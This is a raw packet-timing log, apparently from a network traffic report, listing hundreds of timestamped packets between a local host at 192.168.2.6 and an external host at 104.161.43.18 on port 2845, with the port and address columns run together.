                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.263191938 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.264169931 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.264198065 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.264241934 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.265222073 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.265239000 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.265258074 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.266223907 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.266266108 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.266361952 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.267249107 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.267298937 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.267345905 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.268305063 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.268354893 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.268392086 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.269505024 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.269583941 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.269592047 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.270276070 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.270373106 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.270663023 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.271357059 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.271399975 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.271558046 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.272875071 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.272886992 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.272924900 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.273314953 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.273358107 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.273829937 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.274477959 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.274491072 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.274611950 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.402407885 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.402481079 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.402538061 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.402683020 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.402909994 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.402966022 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.403000116 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.404040098 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.404087067 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.404134035 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.404917002 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.405081987 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.416526079 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.416711092 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.416754007 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.416912079 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.417124033 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.417159081 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.417284966 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.418189049 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.418236017 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.418279886 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.419176102 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.419338942 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.419390917 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.420268059 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.420315027 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.420346975 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.421300888 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.421444893 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.421493053 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.422331095 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.422373056 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.422414064 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.423330069 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.423428059 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.423470020 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.424355984 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.424489975 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.424496889 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.425431013 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.425473928 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.425493002 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.426395893 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.426445007 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.426585913 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.427386045 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.427431107 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.427500963 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.428541899 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.428584099 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.428594112 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.429482937 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.429569960 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.429586887 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.430495024 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.430547953 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.430674076 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.431536913 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.431632996 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.431636095 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.432564020 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.432614088 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.432653904 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.433588982 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.433732033 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.433789968 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.434616089 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.434664011 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.434775114 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.435631037 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.435682058 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.435758114 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.436810970 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.436856031 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.436887026 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.437973022 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.438018084 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.438070059 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.438890934 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.438925028 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.438937902 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.439780951 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.439858913 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.439905882 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.440830946 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.440882921 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.440886974 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.441827059 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.441874981 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.441926003 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.442845106 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.442888021 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.443008900 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.443857908 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.443907976 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.443959951 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.445013046 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.445061922 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.445225000 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.446002007 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.446049929 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.446151972 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.446964979 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.447012901 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.447052956 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.447988987 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.448148012 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.448190928 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.449075937 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.449130058 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.449162960 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.450047970 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.450082064 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.450107098 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.451272964 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.451334953 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.451354980 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.452101946 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.452151060 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.452191114 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.453161001 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.453197002 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.453201056 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.454138994 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.454186916 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.454260111 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.455178022 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.455281019 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.455319881 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.456216097 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.456271887 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.456304073 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.457268953 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.457317114 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.457325935 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.458321095 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.458367109 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.458368063 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.459340096 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.459424973 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.459435940 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.460324049 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.460371017 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.460433960 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.461448908 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.461472034 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.461487055 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.462408066 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.462457895 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.462558985 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.463439941 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.463496923 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.463561058 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.464509010 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.464564085 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.464596987 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.465476036 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.465523958 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.465584040 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.466540098 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.466587067 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.466696024 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.508652925 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.594439983 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.594485044 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.594573975 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.594799042 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.594914913 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.595134974 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.595824957 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.595948935 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.595993996 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.596894026 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.608622074 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.608640909 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.608680964 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.608899117 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.609056950 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.609143972 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.609338045 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.609378099 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.610165119 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.610279083 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.611367941 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.611423016 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.611500025 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.611542940 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.612225056 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.612333059 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.612375021 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.613290071 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.613481998 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.613847971 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.614289999 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.614458084 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.614505053 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.615339041 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.615433931 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.615475893 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.616317034 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.616436005 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.616485119 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.617347002 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.617578030 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.617786884 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.618417025 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.618694067 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.618772030 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.619398117 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.619522095 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.619561911 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.620568037 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.620628119 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.620745897 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:15.621474981 CET284549908104.161.43.18192.168.2.6
